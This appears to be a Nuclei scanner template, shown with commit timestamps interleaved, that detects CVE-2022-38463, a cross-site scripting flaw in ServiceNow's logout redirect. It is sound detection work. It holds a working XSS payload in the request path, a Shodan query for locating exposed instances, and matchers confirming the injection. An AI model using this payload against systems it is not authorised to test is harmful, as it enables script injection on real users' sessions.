2022-09-08 13:28:46 +00:00
id : CVE-2022-38463
2022-08-27 08:42:27 +00:00
info :
2022-09-09 17:34:37 +00:00
name : ServiceNow - Cross-Site Scripting
2022-08-27 08:42:27 +00:00
author : amanrawat
2022-09-16 20:03:07 +00:00
severity : medium
2022-08-27 08:42:27 +00:00
description : |
2022-09-16 19:50:10 +00:00
ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.
2022-08-27 08:42:27 +00:00
reference :
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793
- https://nvd.nist.gov/vuln/detail/CVE-2022-38463
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-38463
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00126
cpe : cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:*
2022-08-27 08:42:27 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-08-27 08:42:27 +00:00
shodan-query : http.title:"ServiceNow"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : servicenow
product : servicenow
2022-08-27 08:42:27 +00:00
tags : cve,cve2022,servicenow,xss
2023-07-11 19:49:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-08 13:28:46 +00:00
- method : GET
path :
- "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "top.location.href = 'javascript:alert(document.domain)';"
- type : word
part : header
words :
- text/html
- type : status
status :
- 200